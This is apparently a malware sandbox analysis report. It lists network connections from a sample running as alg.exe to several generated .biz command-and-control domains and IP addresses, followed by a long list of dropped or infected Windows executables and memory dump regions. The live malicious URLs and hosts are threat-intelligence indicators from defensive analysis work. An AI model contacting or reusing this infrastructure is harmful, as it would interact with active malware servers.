                              alg.exe
                              1.4kB
                              667 B
                              6
                              6

                              HTTP Request

                              POST http://ssbzmoy.biz/g

                              HTTP Response

                              200
                            • 54.244.188.177:80
                              cvgrf.biz
                              alg.exe
                              152 B
                              3
                            • 54.244.188.177:80
                              cvgrf.biz
                              alg.exe
                              152 B
                              3
                            • 44.221.84.105:80
                              http://npukfztj.biz/bwkltopmnrvvwfg
                              http
                              alg.exe
                              1.4kB
                              668 B
                              6
                              6

                              HTTP Request

                              POST http://npukfztj.biz/bwkltopmnrvvwfg

                              HTTP Response

                              200
                            • 172.234.222.143:80
                              http://przvgke.biz/tloyfjsdxsgslusj
                              http
                              alg.exe
                              3.6kB
                              1.3kB
                              12
                              8

                              HTTP Request

                              POST http://przvgke.biz/ye

                              HTTP Response

                              302

                              HTTP Request

                              POST http://przvgke.biz/tloyfjsdxsgslusj

                              HTTP Response

                              302
                            • 72.52.179.174:80
                              http://ww99.przvgke.biz/tloyfjsdxsgslusj
                              http
                              alg.exe
                              940 B
                              729 B
                              6
                              4

                              HTTP Request

                              GET http://ww99.przvgke.biz/ye

                              HTTP Response

                              302

                              HTTP Request

                              GET http://ww99.przvgke.biz/tloyfjsdxsgslusj

                              HTTP Response

                              302
                            • 199.59.243.227:80
                              http://ww7.przvgke.biz/ye?usid=24&utid=9739925920
                              http
                              alg.exe
                              679 B
                              2.5kB
                              7
                              7

                              HTTP Request

                              GET http://ww7.przvgke.biz/ye?usid=24&utid=9739925920

                              HTTP Response

                              200
                            • 76.223.26.96:80
                              http://ww12.przvgke.biz/tloyfjsdxsgslusj?usid=24&utid=9739926020
                              http
                              alg.exe
                              970 B
                              17.8kB
                              13
                              18

                              HTTP Request

                              GET http://ww12.przvgke.biz/tloyfjsdxsgslusj?usid=24&utid=9739926020

                              HTTP Response

                              200
                            • 18.141.10.107:80
                              http://knjghuig.biz/eovjrsnxfvivsmj
                              http
                              alg.exe
                              1.4kB
                              668 B
                              6
                              6

                              HTTP Request

                              POST http://knjghuig.biz/eovjrsnxfvivsmj

                              HTTP Response

                              200
                            • 82.112.184.197:80
                              lpuegx.biz
                              alg.exe
                              152 B
                              3
                            • 82.112.184.197:80
                              lpuegx.biz
                              alg.exe
                              152 B
                              3
                            • 82.112.184.197:80
                              vjaxhpbji.biz
                              alg.exe
                              152 B
                              3

                            MITRE ATT&CK Enterprise v15

                            Downloads

                            • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe

                              Filesize

                              1.3MB

                            • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\setup.exe

                              Filesize

                              1.6MB

                            • C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\DW20.EXE

                              Filesize

                              1.3MB

                            • C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\dwtrig20.exe

                              Filesize

                              1.7MB

                            • C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE

                              Filesize

                              1.3MB

                            • C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE

                              Filesize

                              30.1MB

                            • C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                              Filesize

                              1.4MB

                            • C:\Program Files\7-Zip\7z.exe

                              Filesize

                              1.7MB

                            • C:\Program Files\7-Zip\7zFM.exe

                              Filesize

                              1.5MB

                            • C:\Program Files\7-Zip\7zG.exe

                              Filesize

                              1.2MB

                            • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

                              Filesize

                              2.1MB

                            • C:\Users\Admin\AppData\Local\Temp\Cab4E61.tmp

                              Filesize

                              70KB

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b91050d8b077a4e8.customDestinations-ms

                              Filesize

                              24B

                            • C:\Users\Admin\Documents\VlcpVideoV1.0.1\dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe

                              Filesize

                              4.3MB

                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log

                              Filesize

                              872KB

                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe

                              Filesize

                              1.2MB

                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

                              Filesize

                              1.3MB

                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe

                              Filesize

                              1.2MB

                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen_service.log

                              Filesize

                              1003KB

                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

                              Filesize

                              1.3MB

                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log

                              Filesize

                              8KB

                            • C:\Windows\System32\alg.exe

                              Filesize

                              1.3MB

                            • C:\Windows\System32\msdtc.exe

                              Filesize

                              1.3MB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.Office.To#\e1f8e4d08d4b7f811b7dbbacd324027b\Microsoft.Office.Tools.v9.0.ni.dll

                              Filesize

                              148KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\03cad6bd8b37d21b28dcb4f955be2158\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.ni.dll

                              Filesize

                              34KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\0cb958acb9cd4cacb46ebc0396e30aa3\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.ni.dll

                              Filesize

                              109KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\30d8d74bfb1ebaca288cf641df28baa2\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.ni.dll

                              Filesize

                              187KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\367516b7878af19f5c84c67f2cd277ae\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.ni.dll

                              Filesize

                              41KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\8c6bac317f75b51647ea3a8da141b143\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.ni.dll

                              Filesize

                              210KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\9306fc630870a75ddd23441ad77bdc57\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.ni.dll

                              Filesize

                              53KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\a00997308a0b23912e36a73e1fa45144\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.ni.dll

                              Filesize

                              180KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\afa5bb1a39443d7dc81dfff54073929b\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.ni.dll

                              Filesize

                              28KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\b1bb26704e7a1e8959bfae7d15a7badd\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.ni.dll

                              Filesize

                              83KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\de06a98a598aa0ff716a25b24d56ad7f\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.ni.dll

                              Filesize

                              27KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\e0220058091b941725ef02be0b84abe7\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.ni.dll

                              Filesize

                              57KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\ee73646032cbb022d16771203727e3b2\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.ni.dll

                              Filesize

                              130KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\f030ae7a0ac8395493f8afcd319ee692\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.ni.dll

                              Filesize

                              143KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\f1a7ac664667f2d6bcd6c388b230c22b\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.ni.dll

                              Filesize

                              59KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualStu#\fc36797f7054935a6033077612905a0f\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.ni.dll

                              Filesize

                              42KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\ehiVidCtl\88e20c69254157d91b96eadc9444815d\ehiVidCtl.ni.dll

                              Filesize

                              855KB

                            • C:\Windows\assembly\NativeImages_v2.0.50727_32\stdole\2c6d60b55bbab22515c512080d4b3bae\stdole.ni.dll

                              Filesize

                              43KB

                            • C:\Windows\ehome\ehsched.exe

                              Filesize

                              1.3MB

                            • C:\Windows\system32\fxssvc.exe

                              Filesize

                              1.2MB

                            • C:\Windows\system32\msiexec.exe

                              Filesize

                              1.3MB

                            • \Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe

                              Filesize

                              1.3MB

                            • \Windows\System32\ieetwcollector.exe

                              Filesize

                              1.3MB

                            • \Windows\ehome\ehrecvr.exe

                              Filesize

                              1.2MB

                            • memory/584-486-0x0000000000400000-0x00000000005E7000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/584-471-0x0000000000400000-0x00000000005E7000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/660-481-0x0000000000400000-0x00000000005E7000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/660-499-0x0000000000400000-0x00000000005E7000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/696-171-0x000000002E000000-0x000000002FE1E000-memory.dmp

                              Filesize

                              30.1MB

                            • memory/696-331-0x000000002E000000-0x000000002FE1E000-memory.dmp

                              Filesize

                              30.1MB

                            • memory/780-19-0x0000000000270000-0x00000000002D0000-memory.dmp

                              Filesize

                              384KB

                            • memory/780-22-0x0000000100000000-0x00000001001E3000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/780-13-0x0000000000270000-0x00000000002D0000-memory.dmp

                              Filesize

                              384KB

                            • memory/780-96-0x0000000100000000-0x00000001001E3000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/840-24-0x0000000000400000-0x0000000000AE3000-memory.dmp

                              Filesize

                              6.9MB

                            • memory/840-0-0x0000000000AF0000-0x0000000000B57000-memory.dmp

                              Filesize

                              412KB

                            • memory/840-8-0x0000000000AF0000-0x0000000000B57000-memory.dmp

                              Filesize

                              412KB

                            • memory/840-25-0x0000000000400000-0x0000000000AE3000-memory.dmp

                              Filesize

                              6.9MB

                            • memory/840-23-0x0000000000400000-0x0000000000AE3000-memory.dmp

                              Filesize

                              6.9MB

                            • memory/840-34-0x0000000000401000-0x000000000070F000-memory.dmp

                              Filesize

                              3.1MB

                            • memory/840-29-0x0000000000400000-0x0000000000AE3000-memory.dmp

                              Filesize

                              6.9MB

                            • memory/840-27-0x0000000000400000-0x0000000000AE3000-memory.dmp

                              Filesize

                              6.9MB

                            • memory/840-7-0x0000000000400000-0x0000000000AE3000-memory.dmp

                              Filesize

                              6.9MB

                            • memory/840-206-0x0000000000400000-0x0000000000AE3000-memory.dmp

                              Filesize

                              6.9MB

                            • memory/876-519-0x0000000000400000-0x00000000005E7000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/876-534-0x0000000000400000-0x00000000005E7000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/1472-496-0x0000000000400000-0x00000000005E7000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/1472-502-0x0000000000400000-0x00000000005E7000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/1560-522-0x0000000000400000-0x00000000005E7000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/1668-219-0x000000002E000000-0x000000002E1F4000-memory.dmp

                              Filesize

                              2.0MB

                            • memory/1668-383-0x000000002E000000-0x000000002E1F4000-memory.dmp

                              Filesize

                              2.0MB

                            • memory/1688-712-0x0000000001D50000-0x0000000001D5A000-memory.dmp

                              Filesize

                              40KB

                            • memory/1688-717-0x0000000001FE0000-0x000000000217E000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/1688-721-0x0000000001D50000-0x0000000001D74000-memory.dmp

                              Filesize

                              144KB

                            • memory/1688-714-0x0000000001D50000-0x0000000001D6A000-memory.dmp

                              Filesize

                              104KB

                            • memory/1688-722-0x0000000001D50000-0x0000000001D58000-memory.dmp

                              Filesize

                              32KB

                            • memory/1688-202-0x0000000000400000-0x00000000005E7000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/1688-715-0x0000000001D50000-0x0000000001DDC000-memory.dmp

                              Filesize

                              560KB

                            • memory/1688-723-0x0000000001D50000-0x0000000001D7A000-memory.dmp

                              Filesize

                              168KB

                            • memory/1688-716-0x0000000001D50000-0x0000000001DF4000-memory.dmp

                              Filesize

                              656KB

                            • memory/1688-724-0x0000000001D50000-0x0000000001DB6000-memory.dmp

                              Filesize

                              408KB

                            • memory/1688-720-0x0000000001D50000-0x0000000001DD8000-memory.dmp

                              Filesize

                              544KB

                            • memory/1688-73-0x0000000000400000-0x00000000005E7000-memory.dmp

                              Filesize

                              1.9MB

                            • memory/1688-88-0x0000000000240000-0x00000000002A7000-memory.dmp

                              Filesize

                              412KB

                            • memory/1688-713-0x0000000001D50000-0x0000000001D6E000-memory.dmp

                              Filesize

                              120KB

                            • memory/1688-74-0x0000000000240000-0x00000000002A7000-memory.dmp

                              Filesize

                              412KB

                            • memory/1688-718-0x0000000001D50000-0x0000000001E3C000-memory.dmp

                              Filesize

                              944KB

                            • memory/1688-719-0x0000000001D50000-0x0000000001D60000-memory.dmp

                              Filesize

                              64KB

